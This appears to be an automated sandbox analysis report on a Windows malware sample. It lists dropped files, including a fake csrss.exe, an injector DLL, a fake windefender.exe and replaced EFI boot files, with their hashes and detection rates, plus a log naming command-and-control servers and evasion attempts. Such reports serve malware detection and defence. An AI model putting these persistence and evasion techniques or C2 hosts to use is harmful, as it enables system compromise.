                                                                                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\EFI\Boot\EfiGuardDxe.efi
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):279552
                                                                                                                          Entropy (8bit):4.553173975914215
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                                                                          MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                                                                          SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                                                                          SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                                                                          SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\EFI\Boot\bootx64.efi
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7680
                                                                                                                          Entropy (8bit):4.486535052248291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:MS-DOS executable
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7680
                                                                                                                          Entropy (8bit):4.486535052248291
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                                          MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                                          SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                                          SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                                          SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.11027387102746783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:26hzXm/Ey6q9995Ffsq3qQ10nMCldimE8eawHjc2i:26Ml68rZLyMCldzE9BHjcb
                                                                                                                          MD5:59780508EC9D4F0D75A06B5CD8FDB782
                                                                                                                          SHA1:7908F113274A3C5D2BA954AB1E914E5F73B66609
                                                                                                                          SHA-256:9D15CA570CBA2201A2AA89A0757D23761054BDEB4EA7C69F50FECBE4998D4D14
                                                                                                                          SHA-512:B7C95BC2C0B513E7007F8FFB008A54ABDD07B83BCDE6615811E84CAEA2FB8B761299AC7EB871AE12D365BE726B2ADDF5D631BB38E1D7486FFB272203133667DD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: ........................................................................................)........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .....6..z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........".......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.1127826807463711
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KXm/Ey6q9995FfSTw1miM3qQ10nMCldimE8eawHza1miIQcE:/l68rSk1tMLyMCldzE9BHza1tIQZ
                                                                                                                          MD5:212C7C49EC89D181D5A4009E8FB0CC8F
                                                                                                                          SHA1:1332ABD28D67B9F97A94923F626D8D381D07A218
                                                                                                                          SHA-256:87175704C0ED1C2564DBD4D91C9D150DC89AF92654A30AB2ADC8AC7B4258FC50
                                                                                                                          SHA-512:A1D3672051A1CC05606B363D039D8D6FDD6F55BA1A1BE2A7CF7D06C594CE3D8EC7772762682DF7A8410974E3FB6009A1BBC72FA446A0DC84998FFB4C8943BFB6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .......~z............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........%.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.11264829878785992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:fXm/Ey6q9995FfIg1mK2P3qQ10nMCldimE8eawHza1mK/N:Ol68rIg1iPLyMCldzE9BHza17N
                                                                                                                          MD5:8CA0CDD2FB3FA75BED06C9ABD3277C05
                                                                                                                          SHA1:8493F6EA64D776A0CBD50BF83D3ADA5AEEF65AAF
                                                                                                                          SHA-256:4F408F9E3A5C7550BE4DFC4E74BD8325E8FB347BD2D7A29E235F5EF0E9EC8FFD
                                                                                                                          SHA-512:76E671DF103A3171048058E6B6A93B182F38C19B957D8DD347A1617748ADF60EBF9334F6DABC0BD74E3AEB69AE5CAAD1C7E411157BBD1CBC011820370AA6A8CB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .........................................................................................6.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... ......Iwz............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........@......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):101376
                                                                                                                          Entropy (8bit):5.951577458824018
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                                                                          MD5:09031A062610D77D685C9934318B4170
                                                                                                                          SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                                                                          SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                                                                          SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):288256
                                                                                                                          Entropy (8bit):6.31266455792162
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                                                                          MD5:D98E33B66343E7C96158444127A117F6
                                                                                                                          SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                                                                          SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                                                                          SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 73%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001YS (copy)
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.11027387102746783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:26hzXm/Ey6q9995Ffsq3qQ10nMCldimE8eawHjc2i:26Ml68rZLyMCldzE9BHjcb
                                                                                                                          MD5:59780508EC9D4F0D75A06B5CD8FDB782
                                                                                                                          SHA1:7908F113274A3C5D2BA954AB1E914E5F73B66609
                                                                                                                          SHA-256:9D15CA570CBA2201A2AA89A0757D23761054BDEB4EA7C69F50FECBE4998D4D14
                                                                                                                          SHA-512:B7C95BC2C0B513E7007F8FFB008A54ABDD07B83BCDE6615811E84CAEA2FB8B761299AC7EB871AE12D365BE726B2ADDF5D631BB38E1D7486FFB272203133667DD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: ........................................................................................)........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .....6..z............S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........".......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001 (copy)
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.1127826807463711
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:KXm/Ey6q9995FfSTw1miM3qQ10nMCldimE8eawHza1miIQcE:/l68rSk1tMLyMCldzE9BHza1tIQZ
                                                                                                                          MD5:212C7C49EC89D181D5A4009E8FB0CC8F
                                                                                                                          SHA1:1332ABD28D67B9F97A94923F626D8D381D07A218
                                                                                                                          SHA-256:87175704C0ED1C2564DBD4D91C9D150DC89AF92654A30AB2ADC8AC7B4258FC50
                                                                                                                          SHA-512:A1D3672051A1CC05606B363D039D8D6FDD6F55BA1A1BE2A7CF7D06C594CE3D8EC7772762682DF7A8410974E3FB6009A1BBC72FA446A0DC84998FFB4C8943BFB6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... .......~z............U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........%.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.. (copy)
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):65536
                                                                                                                          Entropy (8bit):0.11264829878785992
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:fXm/Ey6q9995FfIg1mK2P3qQ10nMCldimE8eawHza1mK/N:Ol68rIg1iPLyMCldzE9BHza17N
                                                                                                                          MD5:8CA0CDD2FB3FA75BED06C9ABD3277C05
                                                                                                                          SHA1:8493F6EA64D776A0CBD50BF83D3ADA5AEEF65AAF
                                                                                                                          SHA-256:4F408F9E3A5C7550BE4DFC4E74BD8325E8FB347BD2D7A29E235F5EF0E9EC8FFD
                                                                                                                          SHA-512:76E671DF103A3171048058E6B6A93B182F38C19B957D8DD347A1617748ADF60EBF9334F6DABC0BD74E3AEB69AE5CAAD1C7E411157BBD1CBC011820370AA6A8CB
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .........................................................................................6.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................c3j,...... ......Iwz............U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P..........@......................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Windows\Logs\CBS\CBS.log
                                                                                                                          Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):3080192
                                                                                                                          Entropy (8bit):5.314130349771336
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqIH:TL1dq
                                                                                                                          MD5:CA1379F5BBD36FFAAF5163A464309B78
                                                                                                                          SHA1:6927C04A2725CA246A9DD9EDA85504C38DB76394
                                                                                                                          SHA-256:3584011B777E2BBA89A633353F83384AD8EBC3FCDDC51579BCB42B0AA885F14B
                                                                                                                          SHA-512:5B93BB83E047CC420FF5FF89264F3EBFE69277894616841F4C0F72CD2D6FF5F0BB8450DE8E6C6C70EFE17F4A2A46076372BEFB3A305EA78AD1D243E45728232E
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                                                                          C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20211111_095702_651.etl
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8192
                                                                                                                          Entropy (8bit):3.381558405825923
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:oCF2o+HP5FT9Y2Y6FCoUSI2lZvkn94KJHT28YFz2UMCF6JRxY52:7UvnKoS2bA3bCeT
                                                                                                                          MD5:11889C6C1D894417EFAB47A9FDBF21C6
                                                                                                                          SHA1:543D24874BB616353A923E4CD0BA6C4325C457E9
                                                                                                                          SHA-256:561D50A8E282FEEAFC45C26EF5B9052DD4E3CF205CC16758DDD90A3BAEE1D126
                                                                                                                          SHA-512:988C0C9DBF7E711BFB036A8E4EC0711DD6BE1D7DE36D62C3C58D1683489D5BF1D8114EDAD51191B16A0151FC5DDA05E8813473DB14929D7C7D529D3B3DB15256
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: .... ... ....................................... ...!...........................\.......MJ.......................B..............Zb... ... ..........................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1..................................................................... ......|.y............8.6.9.6.E.A.C.4.-.1.2.8.8.-.4.2.8.8.-.A.4.E.E.-.4.9.E.E.4.3.1.B.0.A.D.9...C.:.\.W.i.n.d.o.w.s.\.S.e.r.v.i.c.e.P.r.o.f.i.l.e.s.\.N.e.t.w.o.r.k.S.e.r.v.i.c.e.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.D.e.l.i.v.e.r.y.O.p.t.i.m.i.z.a.t.i.o.n.\.L.o.g.s.\.d.o.s.v.c...2.0.2.1.1.1.1.1._.0.9.5.7.0.2._.6.5.1...e.t.l.........P.P.\.......MJ......................................................................................................................................................................................................................................................................
                                                                                                                          C:\Windows\rss\csrss.exe
                                                                                                                          Process:C:\Users\user\Desktop\4t4y4r89UZ.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4520488
                                                                                                                          Entropy (8bit):7.954926052042642
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:wymevTOPXdqwIzrd1I8FM2Cmg1yX/EdY8Pfk7KqDgJGNv04+ASYD:VmaaPXdqwzyvUYzgJyMQD
                                                                                                                          MD5:14C0D8425930CCEC0566B04864A05670
                                                                                                                          SHA1:07FD6746417C89239E8B4B272FA350C5DC41C580
                                                                                                                          SHA-256:FEA538EFF5BC9CD3970EDDA4B3DDFA0E72505B01DC207E47D8112074720FA05E
                                                                                                                          SHA-512:12E0FE096E8E8FB54C3C820580EE1EF536F0A6BD014C057FDE4263F1DE643D0E51D27850AE6DEF83C013FFB49F02699A651D0B422A5FB7C396CCB961ADAE5E05
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                          • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z}X.Z}X.Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}X.".X.Z}X.Z|X$Z}X.,.X.Z}X.,.X.Z}X.,.X.Z}XRich.Z}X........................PE..L......`.................zC...p.......A.......C...@..........................p........E......................................}C.P........@............D.(....P......@................................{A.@............................................text....yC......zC................. ..`.data...lho...C......~C.............@....rsrc....@.......B....C.............@..@.reloc.......P........C.............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          C:\Windows\windefender.exe
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):2102272
                                                                                                                          Entropy (8bit):7.879347868736008
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                                                                          MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                                          SHA1:AE0E12BC885CB5D4D26C49F6AE20ED40313EDF99
                                                                                                                          SHA-256:FC8D064E05EBE37D661AECCB78F91085845E9E28CCFF1F9B08FD373830E38B7F
                                                                                                                          SHA-512:03D1440B462B872B7AE4FCCBB455FC0C3AB4E9BF13D07726CE2A9FF9CE4A0E7632A45AF4B52265973D51C8C9D6E24CE84EF81FBAD23CDDF04B64F461FA55050D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                          • Antivirus: Metadefender, Detection: 29%, Browse
                                                                                                                          • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........K............... ......p-...M...-...M...@...........................M...............................................M.....................................................................................................................UPX0.....p-.............................UPX1...... ...-... .................@...UPX2..........M....... .............@...3.95.UPX!....Y.P....dM... ...K.&'....... Go build ID: "8LgdNw10OMnjnEaf..o.ouob/F_u>d7bw5LzGyMt067q/f_4E....n-IIykrT4Xu-NukD/RUnzYH.IbGfj....1LuaRla". ...d...........;a.v ....'....D$...$...`..k..&...............f.......dnl.L$h......m..g$....4..$....,.....\H......1.1.TP....~..|.\Z.;cpu.u.d,.T.@.....iT=........H9.............Y...?.............l.....0.9....lX..?(.|$<).......!..}...$.T..$0............Z..\*f..on....m.......;5al..p7.......M..$.........L....A....9.}..w._.9.- .9....5...p........
                                                                                                                          \Device\Null
                                                                                                                          Process:C:\Windows\rss\csrss.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1893
                                                                                                                          Entropy (8bit):4.9781217303638385
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:nv491EHNI7/AYdaAwyHHMJ2Qs0iPys0io:nvICHNI7OyHHMJ2g9F
                                                                                                                          MD5:A557C4FDAF53B1AA77384BEFFA92661A
                                                                                                                          SHA1:1ED645B8AA469ACEBB0A9AC34998683A600FF108
                                                                                                                          SHA-256:0896EF145C7A6E9609420C98F98D873CD72579B8FBDA3CD159D96318E786416E
                                                                                                                          SHA-512:D439E04A0DC5B36667D832EA54FDAC88F318D1FC9A592427EDE1474FE79D16583AD059F5C651E16E968B039CE8E130999D841044AFD9BAFF9CA3041A729F8FE7
                                                                                                                          Malicious:false
                                                                                                                          Reputation:unknown
                                                                                                                          Preview: 2021/11/11 01:57:24 servers count 16.2021/11/11 01:57:24 logs endpoint https://runmodes.com/api/log.2021/11/11 01:57:24 initial server https://server8.trumops.com.2021/11/11 01:57:24 first install, ignore discover on start.2021/11/11 01:57:24 default browser ChromeHTML.2021/11/11 01:57:28 before EfiGuard.2021/11/11 01:57:29 poll response body {"signature":"5745c2e019f85235cbd094aa07f8f24e47db8c0cbdffc6471a50bc49778724d141f4e71bee8b87e0c37930934dfae49063d3b4db5a88b42f150bfc10bf1ca10f"}.2021/11/11 01:57:29 poll signature verified 5745c2e019f85235cbd094aa07f8f24e47db8c0cbdffc6471a50bc49778724d141f4e71bee8b87e0c37930934dfae49063d3b4db5a88b42f150bfc10bf1ca10f.2021/11/11 01:57:34 reboot in 1s.2021/11/11 01:57:35 rebooting now.2021/11/11 01:57:40 failed to hide app: unacceptable PGDSE state: 65.2021/11/11 01:57:43 couldn't exclude temp defender: couldn't create device: The system cannot find the file specified..2021/11/11 01:57:43 service is not running.2021/11/11 01:57:43 service needs an up

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.954926052042642
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:4t4y4r89UZ.exe
                                                                                                                          File size:4520488
                                                                                                                          MD5:14c0d8425930ccec0566b04864a05670
                                                                                                                          SHA1:07fd6746417c89239e8b4b272fa350c5dc41c580
                                                                                                                          SHA256:fea538eff5bc9cd3970edda4b3ddfa0e72505b01dc207e47d8112074720fa05e
                                                                                                                          SHA512:12e0fe096e8e8fb54c3c820580ee1ef536f0a6bd014c057fde4263f1de643d0e51d27850ae6def83c013ffb49f02699a651d0b422a5fb7c396ccb961adae5e05
                                                                                                                          SSDEEP:98304:wymevTOPXdqwIzrd1I8FM2Cmg1yX/EdY8Pfk7KqDgJGNv04+ASYD:VmaaPXdqwzyvUYzgJyMQD
